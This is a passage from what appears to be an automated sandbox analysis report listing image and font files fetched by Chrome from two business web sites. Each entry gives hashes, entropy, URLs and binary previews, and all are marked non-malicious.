                                              SHA-512:252E5C420A0452318DE73F104A361D13923C5C6ABD89A064B11D94D9E687DA5B8D37837E300B0786C7ED7D848DADDC3D90D077A31CE9512E3CD1CC826D8A3D7E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...JPLTE..............K.............................=96....................................;..HA?@............~......5@................X.....E.....T..............7..............ZWX*'(..o-...#,MJJ.....a.........F5...Y6R]..........}u...cm...hff.Pd.....|'wur.....B"<HEak...vd....\M.....o|Zr}..?1DM..m....|j1..../8...K...an.LQ..^+..Tb'....IDATh.Wk{.J..@p@c0@..j.1..b...j..Oj4.....I>.....1=..^.Q..../kvPZ;..s+..Oi.v.[.....8....5..W0._.K.1....x2....s..U..Xaj..3..z.+r....>..X.>M...T.8........t.r-T..7...1/...6|...E.l...W|....w.]...H9....."A.iA....\..1<...}.]a}...v.........."0.a...[...}.{....H.v.|..,.K...C.1hp....]an....49...O..v.'.Hl.F.m.9...$1./.0.(..i1..A..L..A.;.K...N.M+.#..T...K.q)........q...y..pe...<...l(M...... %...@^.....=;............b.8...#).UU!E.......w.B:Tb.T..s..^...J..i5O......t1.?......1........!|Vg.f9l.h-.x>..a'@.q...h|z|<..Cp`...y.....8T9........a]L.k...../O.Gk,..:...DK;....,.t]k.Q.."2n.%...~........
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):11320
                                              Entropy (8bit):7.51971613768901
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKww+qLSaiTSGUPc5V8jcdnNna4Fn29CPJBxqw9KGD/3:4YNg7wPSxV8j+n9HaxGz3
                                              MD5:8BBA6D6CE4EFF0A9885D1DABF062FE46
                                              SHA1:0A636D453D273F39D1C9B7082E710F92250DB9E2
                                              SHA-256:BE07C2E48DCEE8A171DFB79E6CEC31B979660F69C1C2CDED2C39AC6F4A60FB12
                                              SHA-512:21CD829A765733FDE67DAB0A0F96996668DF525760D2EAF57DC44F6A4985457425161CF3A36E80AC13ACE496C458119CEBEFBEA3DADE0F61DD23F7B464D7C101
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):12658
                                              Entropy (8bit):7.984596538119976
                                              Encrypted:false
                                              SSDEEP:384:LxkOxpSsb4nFTa4Whgi9k2eo/t2Xid03U2eKs3BUZeZrP:lkO7SCqBa4WaFo/8SZKqyZe
                                              MD5:6C3005527E11636FBA7366BF9B8C4079
                                              SHA1:D667AEBCAAECB5AAA775E0695BA67CD82C6F4926
                                              SHA-256:B1C54CF12A7EF3DFDB0AD55D3C885D40958423F36E3FB210F987569C1B9B12D7
                                              SHA-512:C11BE59DEFBF58E30699AFE17C712581ADE7FF30CB22629132CE6FB39F518812EBBFCD7D50A1AEC30AB004344C54D351EBB35FBEC57B3EC27CB8486A1DEE5378
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFj1..WEBPVP8X........+.....ALPH-.....2...l.e&&.*.E......z....n...y..)...2S.......`....0.I .....=" ..6.7U.G;!.......G..B..?4.%%.....Q||.......s..,.2...`;.&.\>?...QK-z...iZj..../J.!...=.../r. ...?s.s...&..]....W.k%..+.c.h.O.xf.U.m.v.D..!.3.+.o..j.W.B3aD.W...%....{...N.....A.......]A.C...8.W+..<.[n.....Qb....U.4K...|.8..a.....N...........\..x`..lM@..Q..._.%...A.d.~......~Q.oC..:..o._.....I...'.F...5m..,..[.Y2$..YIA#..v...C.a..O.Q............L0|.hL.Ty2......#.9&........EjA....5.............$l..0E..z....Y..e...]2h.....p.B..Q_..R.....et.m...b...7^...p.*............]...L.3..]..EW<..6...m.W..u....R...1Ng.D.."........cP.g.Q.`.Z.lw.vQM{.^....P.4.L...G.....~Q....<...9..."...1..K....6....(.........m...Y..m..}BT.q.....|..N....v.J...U-...9g.=.s8..(N..W.....#.'k.;..!...m...Y.B.....`U...V.....O..(;=q,...G.^.LD4P.n..`......^.@.`.w...78...... .F.....Q...~.......|.,`.K...M..A...D.j.HYt.....%.g.. .&...9.....C8... 9....K..#.mJ.|.X.DB(...2.*A.t..D..J..L.74..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):72896
                                              Entropy (8bit):7.996854789103847
                                              Encrypted:true
                                              SSDEEP:1536:SMAErzL6/yPjrfof/nDgI1dHnHS4Hhb8TFEV3pl38os5Po:rLvfqBdHnPhb8Tcv3835
                                              MD5:26ECBA6DA4FA9E2A64B4658051BE6479
                                              SHA1:22AC47E427D11FE4AE376781330AA71E275353BB
                                              SHA-256:9493F4E3CC5F61BA2646F34E4CB56106354444F3BCDF0EB566805CB96AA20CA9
                                              SHA-512:00F360DF70A1B239BD59E65109D13EE5BE5B55271E797FFD35428C3658064502987258583C7B55A435A19D69793329B8B61715D1554E5F9C3E9E05C5FCAC814B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/services/branding.webp
                                              Preview:RIFF....WEBPVP8X........O..T..ALPH2Y.....m.I......@DL@..A......Q2...R..v..*:...._...~.T...Y..gn.m...3&..:Q.*@....n@..p....g&8U.>.........@B.p.}..1.3.}#"`...6B /.h71i.I..v.m..l..wnR.U..4.6...-...:.. ..L`C...T....!p..u.d}..2"...........F*.....+..s.{"...=...D.S..)&).L.........?.=#Ti..y..^_.....?.....m..3i.......U....~.l.....Uf..}.X.e.?/.....G.........g.*.6.....xR|^{Q.R."..!......v.V......H..U-..j.<.r......N.g....T4...../...?.?...T............K^.d....1...8=s......si.....Y...EA<.=..}.&..dZ>./....g.....>.V..\Z}yL..+|..R.{.>.Y..........g..<.M...)../...)Vx6......>..u}......tWp:..?..k.t;..........S...s..?3..i/........L...r.Fy.2...p.......^.ax.-....T.6..........S.7.$|.k...).i...V.B....B..@/....D.N...3..g...._.\A..q.....'....i+.iN.>.gN".........O.'.&..2u..h..e..SB\v..*.M.......P+..r..........s.+>4....-......q{...z{.T....^...8ay.... _.@.*..x|..T...P.*......<"..FX?..,k....!...7%={Rv..{..t..%G)P?^..(:..p.......}.!k..9...@_|,.....v..9.Y....Y~.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):56572
                                              Entropy (8bit):7.995511617677945
                                              Encrypted:true
                                              SSDEEP:768:AKwi/qFsohxhnWNxFCYrZEHr8j+jo4S/2Z1Ps1KwoqRSEI3JcGjehAcA9/S3Zgq:DwAqBnWNxFdZEwZ40o1DcGjehi9/kr
                                              MD5:79DCBA8281FB8546D0F14592E97F5019
                                              SHA1:5B0221A0233F6D128697298F209157CF727FC47D
                                              SHA-256:567DE5EA4176C023EDBDE63467E87663E4AC073FCF8C249A2BA5298C8F0ADD0D
                                              SHA-512:139DDAFDC48D99D6EB9F9159AEF2C2BC26544217C0B92CE80184C2C4A4A7903815E57DC10D76A11C2DE417200A8A801F7A802EBB2682A3538583482C1842488C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/10/579de64f97d717521a5fc6fcc0eaa118.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 .....>...*....>.n.R.&%+.Q..p..gn....o.S.....z.K......7.:t...Z:]...6?n................Ps....<../.o5..}b~....c.^...S.......q}.?.z......'./[....7.7........i...................{..............R....o...zn..._........o...o.z..Y.w.+.......~.{.....%..p.|j.....R..5.V.F.5J....[a...+l#_..mgQ...U7...;..mZ.../M\..rQ.C..... c...#.<.;O...?..g0.U.l......99XEg..]....|..B..jY...w.FmR.G..6.b.6:..M^...%sJ.6r....S..z.>'.!..8K*!Kx..v.).L..l...F.1.!.B..D...h.Q.xI..#..%D..w.... ..1...7;..J....2....G.,k....H...Jn....v..=.....S.;...u.....V.JQ....y....]..i..5.....!.r...|i\.+tp..N.?.../.......i-.....Z...h..+p]......Ly...j6.4.F.u(.Rj......z|m...f...k..K;?T.E:...^V....G.r..,.zTNqs..p..D.T.w...%+......K`.t.C*%.en..i....w..VW03.].jVJ.k......P..2....Q4....=j.o..'D.....*./..8lEB ....w".C.......w.E..O.!.uU./.-mm.m..J|{...U.....J..w.J.9..`.n.Z......../.c@B@.Q..gu.lB..e...J..l.c............$......<...scr........H...B@....\.Dj....l&j2..P!;.._.B
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16076
                                              Entropy (8bit):7.716307828415955
                                              Encrypted:false
                                              SSDEEP:384:4YNg7Z6dbwpARxyQDmKpyGPhIpzpIMjN4ETxWdiC:4Yy1myQDmpGPhIoMOiWQC
                                              MD5:BD87BBE49FC65DDAF67FA4A7166052E0
                                              SHA1:D67360A398D53C9FF7922FF5939F9AB3E503E709
                                              SHA-256:6034CA2F944C35C3A242319E8167DB7F3A77EBF5BAA91E091B46F7CAF983B60D
                                              SHA-512:D62233A271B3066B12ED6C840DACC049FA435F92C8A5A9A24700C4CB4BEA8CDDE158C7C6BE0CC9A65D80F97A372CA4FE413A90C7E87A71D66FEDA8B48E5A701E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):25797
                                              Entropy (8bit):7.832766452790604
                                              Encrypted:false
                                              SSDEEP:384:Z0VInDOAKKifMmvaeptPRUN50UcXvXPwPasf9bXV7zCrLs3O1BYPJIDbp:tnSAOpaGUeXPwPaI9bl7zx/a
                                              MD5:60C29334D071060CF624D1EDC6DE2FA5
                                              SHA1:4FC195BDBC96F90D692515B55396B6739B1934CC
                                              SHA-256:9BF922A78CE5CD210980F7E120599C750EE1E25A6FC2EEDFD682DEC2CF20C222
                                              SHA-512:E7994EC6FBD9DDF5C615C899BBB3351A4773293C7603E7C60EF013920EE76369BC70168E3A408031B70A444B23E3D3123D4CE1840D72448E411F95979C0F2CBB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/6/64adabc2804b7b05e75ae4cd2b4d3c10.jpg
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:D3D5F94E933011EDB1FDD27771EBA6AE" xmpMM:DocumentID="xmp.did:D3D5F94F933011EDB1FDD27771EBA6AE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D3D5F94C933011EDB1FDD27771EBA6AE" stRef:documentID="xmp.did:D3D5F94D933011EDB1FDD27771EBA6AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................6...KH..d.................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):14084
                                              Entropy (8bit):7.64756924338399
                                              Encrypted:false
                                              SSDEEP:384:4YNg7esKs583x5L6HItWXtIVG7JZqdGku3K:4Yy6sy3x5+ocXtgTX
                                              MD5:66126F5CAED4A79198979ABBCAD7D39A
                                              SHA1:256457549966445B841BA02C02B6EE32D9B84625
                                              SHA-256:41DD027DB271C5E0597E77A738E888D69280C64E36D75931B693D733CBDA0FB1
                                              SHA-512:37D588F12BBC219AE496D0FFEB830BC7DCCAAA7D92AD794A7B9E1992385F21F2EEA507CAD984E55E4DAF7D9045C149BCB0C4175DD2F35541F87C5D7D8FA941AB
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 24488, version 772.1280
                                              Category:downloaded
                                              Size (bytes):24488
                                              Entropy (8bit):7.987907109929418
                                              Encrypted:false
                                              SSDEEP:384:Ok8mTTNu15tM1xuB9dYY7YRHmOdjzUJsAr4p8Oq7kpPyXBpqrhDRBybCpMuT33SI:OGg15tM1xuBYY7YRHmcjzUJJr4p8Oq7a
                                              MD5:747442FA76F1D9A31F9A54A2E8A4B448
                                              SHA1:07FC0AE14BB3187839082AED3BCA11DFB1E04524
                                              SHA-256:9169D8BE7A8177E5A92A4D04B6DE7F6504B938573BF4DA5889871C4F376D3849
                                              SHA-512:274DBE5BC31C560D2CC2D15AFE5485687B2F7DD0EE24FFED99627310EA36A6A3CC1C91E22368F909D056F4FAAB051838D469E0BFE8A30169B735ACA5EB0F402F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/webfonts/fa-regular-400.woff2
                                              Preview:wOF2......_..........._].........................8.$. .`..P.....h.,.... .svU!=o.=DT.z8#9i...j..w..*~...?..3p\.u.<<..~.N.... e..........!.i..G.........wFA.?...S.C...H48Y..`:.=........{ ....@.. .J.D...J.Y..=.).Is..;.>c.Tg.(...j..x..:.uo..;..7e...'\.^%.JE.*Vi1:.i...N...G?..|..7.g..Yg.....8..7+'.g.sb..C.Y.f..I.I ..-...PE......l..d..E....KM.).w..O{7,'....`c........%0.....fw){F[G..M-.t...H..i.w...M).......H...!...M5{...@.*.1.)t!..{.o...-v.....T.<]. ..I.?..]..@R.@..)^J.C...L.yTq18'....C......S...to..\.*mc0...,P.[E.T...0B...8.._.r.0H..i...te..B.D..M.....oi7.......I.._..5.r...h..6eCR..2...a.w.'.s..V...('n.~.n..(....h...R..4.t......+.+...~...b.j MH...TB."L*j.J..RZS.T,.aS|][*~...M...K...]...r].Uy.2......,........r<.^._.G].I.2v...W_.H..~....H.S.n..v^..2.i....=.....|..'...kR(.*....U.k........4..k.r[Y..j./X.S{*K.,....57..._Un...C..b.V2.....u..5Zy.:..L._.6n...D3.Q.. ....v;..n{..~..t.aG.u.q'.t.ig..l.x...k.........T.q&...&d....lS.9.....>.7.[.....|V>'_
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):11256
                                              Entropy (8bit):7.521185189967952
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwJ+hOLl2vO+livdOSk5HmCr4x8qCoRjREGrqa:4YNg7JfQO+IvdMQy1qCIjREuv
                                              MD5:87D8BCF63B9F9D08C2D8D2BAB4C044F3
                                              SHA1:D7D5790031027566438F5B70551C642CDD6E0AB7
                                              SHA-256:1E2E317303D0C4E000359EA0237D8C967606868A575E8F1AF3BCBC3CDBD3ADD9
                                              SHA-512:37C0282987E7D33D472DD758F9EB70C6EFC037B2D8174FFA0BFEC58F15ECA480706061D9FABBF8F0921762AF9BA6C6887C8E1FABDE652970AA9F124D4A0C2658
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/34/71b5d2e7e3a38e21f26035499e54b8cb.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 551 x 44, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):1530
                                              Entropy (8bit):6.911719464715939
                                              Encrypted:false
                                              SSDEEP:24:g1hGHWwjx82lY2T3T0VrEh8yJ3V8wG/+YHDRqb3h19o/yUO80NLaI:+JNn2U6vJ3l4h03loKUO807
                                              MD5:AA189B8A083CC33FE67CC459BF6BB358
                                              SHA1:C70B7ACD0D076B7ABAA973F2AA788D7518709B82
                                              SHA-256:EAA9DD099D2BEAC61845A4B03FE6C7AC3AB83B7BBFBFA91B50093C348F9B04DE
                                              SHA-512:323BDA2A7337D078E3E114CA948D29A0FADA40780CEFF837C3C11D9F24A9A0FA660ED996EB46EB39AB35BABFA7DD6A87C88979FCD527A2E27B56F9F717A2DD29
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/15.png
                                              Preview:.PNG........IHDR...'...,........7....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:679059D4A39211EDA71FFDA57E7EBD11" xmpMM:DocumentID="xmp.did:679059D5A39211EDA71FFDA57E7EBD11"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:679059D2A39211EDA71FFDA57E7EBD11" stRef:documentID="xmp.did:679059D3A39211EDA71FFDA57E7EBD11"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......jIDATx....MSQ....a.6.2.u./.........(.....,.X'.N`.@..{.`..B)=.<O.r.EO..7.9=.....@..........d...E.cf.......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):72902
                                              Entropy (8bit):7.987918984883526
                                              Encrypted:false
                                              SSDEEP:1536:XCjK5eSCJhsJd9APVtC4ECO822TEn0nXvCP+ABE/J3IejRvwczbABgv+yK1UJ5C:XCOCJM+C4c822Ya6P+SCjRfbABgvfA
                                              MD5:346FC7D1F0DBF38B2FA7C25688319976
                                              SHA1:2D27A65F07A9167F36A8E548167653688BFDD546
                                              SHA-256:3D71A1E8004058039164EBC0F4F5F4314688C7ABE6B6FFE64AA1579C2189EF49
                                              SHA-512:D97904EB2B76710D55A6A571E4826C48EEB413AD9AF7858B9FF380A650928AC7D6C93EEA9AE148FD9E65E4744FA86D1F2D59BE629FA213B9D9C50BC054058476
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............ALPH.e.....m.Hu...."b.rL%.J{$....$sQu.E..F.&.Bb.rC..6Il.@.,.2.hs..Y....M.AX.E.I/....z.'?.O....|I..ol.ykk....b......9Q.R....'.EqU..s..H.L.p.NDL....H.m..U.RC.....:9.j,.].........#"}.*"&.n$I.$I.b.ANB.2.4O.5/.\..'rXo.....w7.PDL...("...Kj.{C.!.$,.l....(D..t...Cf[....G...._........>..&..R.!X.N....|.....@..$....P~.g....j.,..4$..iHP.[.......@...D.......y....XQ4.G3C...A...>.gXu......E..x/72...$jU^.SN...Q...>...p..K.[D..D..lE...J<!A..K.I*.<.r.$.L.`....V.{d.....^.&A..myB...?.9X.W.(....9H.....Y.......G..^.4........(..0..%.eYy..xk}...%z.V.Y...{.=...U....!..l..$..."y...q.M...X..7.[..+KN...Dm....0E5..V$..&M...N\C..G.&....'dS..6W.lh....'T&].6.....$.$H.h.\A..9...V.t....X.V..X!.2.gAY I..YM..(I..HbM..2.k......`.G0..X.A..v`"`....x....|".,H.[.ZarA...$.X6....g.$......5.6T.6.=..Q...K......1...}.?.}.........kR.,....tJ.g.+......%e?M.Xs]..I.....>/..@.M.o....m....J........n.....%v..K4.2%q.,IP{.5k.l..)..B_.~../..u.5..V_0..O_."k...x...R..}.RI...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5892
                                              Entropy (8bit):7.929494619119123
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/x3DFhR0/Vwjfa3t6seWvaC1xar1ds0t3:UIIHUCD4wapFU/qe9r5L0q0t3
                                              MD5:F67AC47301AA0AC0217EC408BFFE7192
                                              SHA1:B501BB510E64070ED3127BB34FB1CDF414FA11CA
                                              SHA-256:C17DB79446B156B79A100A79F82D76695D48A3AB5B6070B9FF755E275E241090
                                              SHA-512:6B5A36F66954E0489DE8AEADFC56E7A4954D698E92AE22EDEB6C95BA850867A28374B5820FC15AFD82925325114A3DCD5817719DFA09DF6A58CF736A7388525A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/24.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 0x0, segment length 16, baseline, precision 8, 550x550, components 3
                                              Category:downloaded
                                              Size (bytes):52874
                                              Entropy (8bit):7.956897604559998
                                              Encrypted:false
                                              SSDEEP:768:hITrQ4fdfKsZzfR8nFscyrahdLZh2I6brxkYPp0b5HhFMQGbzbdZc+ZxixW:ClfHV+njyrC9h2R9xp0xh6Rc+Z/
                                              MD5:AA5D4A7082D4612173F434AE453FAB60
                                              SHA1:2EDE60C19BACFEF3D1C6D0E9ADBF0C47BA0CE612
                                              SHA-256:00059EA6ABF0DB85605E3FA11CD274FA7F3A1A3F76758E47CAA3EB412E5228B8
                                              SHA-512:E3A6808E5A81C34885C97E6D52051DFA11BF5EAF4520E62AA064CACA27E4F185F65E9BF5B0D4652C613C408FA64297B5974C53828E38C9CE5AC7780CEAAEB0DA
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/12-years.jpg
                                              Preview:......JFIF.............C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......&.&..".........................................P..........................!1.."A.Qa#2Bq...3R.$b..4C....7Dr.....%STcs....5..t.................................9.....................!.1A..Qa.q....."....2.B..3R#b4r...............?..c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.2.].-....3....R....>..@pCifH.\..w...~....ug.P....U..l..qt#n..=3.....l(M.If.Uy..a.0..I.._N..#.'~..pg-.iv.5..w.#..N..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16471
                                              Entropy (8bit):7.730604293307563
                                              Encrypted:false
                                              SSDEEP:384:4YNg7CJJdnH43E3ufWwVvWyD5JA4k8grA:4YygVHEEzwQyDY/8grA
                                              MD5:38CA778B8D34646B2CA63C338A81DD5C
                                              SHA1:69AF59D8D622BE13CC6127E274A9BECF12A5E71A
                                              SHA-256:A36F1FD0D0B01B05ACED180BFB01E26222E2AE3EB6B5A409D82E9937D63B469E
                                              SHA-512:6FB078A99E1AF67576DA7DA4ED49A10D6AEC802E0CBA453BC45F4FE54E7556150768191ADF786775800541C887D0F47AEF2F6E8E5ECAD5FC58055B50DB6C31C4
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                              Category:downloaded
                                              Size (bytes):665
                                              Entropy (8bit):7.42832670119013
                                              Encrypted:false
                                              SSDEEP:12:6v/7OEUelyuRs56fyKgIEInu5VLJBZInmJhd/3VqQXD8GBm1:belFRs56fuIEIu5VNBZInMTICfBO
                                              MD5:07BF314AAB04047B9E9A959EE6F63DA3
